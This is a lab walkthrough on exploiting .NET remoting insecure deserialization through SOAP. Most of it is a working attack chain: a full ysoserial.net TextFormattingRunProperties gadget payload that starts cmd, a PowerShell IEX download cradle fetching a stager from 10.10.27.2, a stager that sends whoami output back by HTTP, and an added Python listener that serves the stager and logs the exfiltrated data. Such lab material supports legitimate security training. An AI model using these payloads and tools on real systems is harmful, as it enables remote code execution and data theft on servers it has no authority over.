.NET Insecure Deserialization

Task 1. Perform reconnaissance and find a SOAP-based web service

Interact with all services of the web server to find the one that you can talk to via SOAP messages.

Note: The binary used is based on NCC Group's vulnerable remoting service: https://github.com/nccgroup/VulnerableDotNetHTTPRemoting

Task 2. Execute code on the remote machine

Use ysoserial.net to generate a payload with the SoapFormatter. Note that you might need to remove the <SOAP-ENV:Body> tags from the resulting payload before testing. Also make sure you respect the format of SOAP messages.

Task 3. Get command output using an out-of-band channel

Turn blind code execution into non-blind execution. Prove that this is possible by executing a command and retrieving its output through an out-of-band channel.

The web application.

Viewing the source code reveals the .NET remoting endpoint.

Checking if the application reacts to a SOAP message.

Generate a payload using ysoserial.net.

ysoserial.exe -f SoapFormatter -g TextFormattingRunProperties -c "cmd /c [command]" -o raw

The generated payload is below. Because the SoapFormatter output is plain XML (there is no length-prefixed string to keep in sync, unlike BinaryFormatter output), you can edit [command] in place without regenerating the payload.

<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<a1:TextFormattingRunProperties id="ref-1" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/Microsoft.VisualStudio.Text.Formatting/Microsoft.PowerShell.Editor%2C%20Version%3D3.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35">
<ForegroundBrush id="ref-3">&#60;?xml version=&#34;1.0&#34; encoding=&#34;utf-16&#34;?&#62;
&#60;ObjectDataProvider MethodName=&#34;Start&#34; IsInitialLoadEnabled=&#34;False&#34; xmlns=&#34;http://schemas.microsoft.com/winfx/2006/xaml/presentation&#34; xmlns:sd=&#34;clr-namespace:System.Diagnostics;assembly=System&#34; xmlns:x=&#34;http://schemas.microsoft.com/winfx/2006/xaml&#34;&#62;
  &#60;ObjectDataProvider.ObjectInstance&#62;
    &#60;sd:Process&#62;
      &#60;sd:Process.StartInfo&#62;
        &#60;sd:ProcessStartInfo Arguments=&#34;/c cmd /c [command]&#34; StandardErrorEncoding=&#34;{x:Null}&#34; StandardOutputEncoding=&#34;{x:Null}&#34; UserName=&#34;&#34; Password=&#34;{x:Null}&#34; Domain=&#34;&#34; LoadUserProfile=&#34;False&#34; FileName=&#34;cmd&#34; /&#62;
      &#60;/sd:Process.StartInfo&#62;
    &#60;/sd:Process&#62;
  &#60;/ObjectDataProvider.ObjectInstance&#62;
&#60;/ObjectDataProvider&#62;</ForegroundBrush>
</a1:TextFormattingRunProperties>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

In Burp:

  • Remove the <SOAP-ENV:Body> and </SOAP-ENV:Body> tags

  • Set the Content-Type header to text/xml

  • A SOAPAction header is required for the request to be treated as a valid SOAP message; any dummy value works. This is a property of SOAP over HTTP, not of this specific lab

  • If you receive an error stating "Requested service was not found", you might also need to remove some whitespace / newlines between the elements

Create a file named payload.txt with these contents and serve it over HTTP from 10.10.27.2 on port 445, the port the stager below fetches it from:

$c = whoami; curl "http://10.10.27.2:445/$c"

The output of whoami is appended to the request URL, so it appears in the listener's request log. Then replace [command] with this:

powershell -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.27.2:445/payload.txt')"

Because the XAML sits as escaped text inside the SOAP element, the double quotes in this command must be escaped twice, i.e. written as &amp;quot; in the payload; a raw " breaks the inner XAML and the gadget never runs.

Observe the results of the whoami command in the listener's log.
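A listener for the out-of-band channel, added here as an example and not taken from the lab: it serves the stager as /payload.txt and prints whatever the target sends back. Unlike the one-liner above, this stager percent-encodes the whoami output and returns it in a query parameter, so spaces and backslashes arrive intact. The listener address, the parameter name o and the function names are assumptions.

```python
#!/usr/bin/env python3
"""Out-of-band catcher for Task 3.

Added example, not code from the original lab. It serves the stager on the
port the remote host fetches from and logs the command output the stager
sends back in the query string. The listener address, the parameter name
'o' and the handler names are assumptions, not from the page.
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

LISTEN = ("0.0.0.0", 445)   # assumed: attacker host, same port the stager uses

# Constructed stager served as /payload.txt: run whoami, percent-encode the
# output and send it back in the query string so backslashes and spaces
# survive the trip through the URL.
STAGER = (
    "$o = [uri]::EscapeDataString((whoami | Out-String).Trim());\n"
    "Invoke-WebRequest -UseBasicParsing \"http://10.10.27.2:445/?o=$o\"\n"
)


def decode_exfil(path):
    """Return the exfiltrated output carried in ?o=..., or None if absent."""
    vals = parse_qs(urlparse(path).query).get("o")
    return vals[0] if vals else None


class Catcher(BaseHTTPRequestHandler):
    def do_GET(self):
        if urlparse(self.path).path == "/payload.txt":
            body = STAGER.encode()
            self.send_response(200)
            self.send_header("Content-Type", "text/plain")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            return
        out = decode_exfil(self.path)
        if out is not None:
            print(f"[+] output from {self.client_address[0]}: {out}", flush=True)
        # Always answer, otherwise Invoke-WebRequest on the target blocks.
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):
        pass   # keep stdout for the exfiltrated lines only


if __name__ == "__main__":
    print(f"[*] listening on {LISTEN[0]}:{LISTEN[1]}", flush=True)
    HTTPServer(LISTEN, Catcher).serve_forever()
```

Binding port 445 needs root on Linux; run it with sudo or pick a port the target can reach. Any command works in place of whoami in the stager as long as its output goes through EscapeDataString first.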
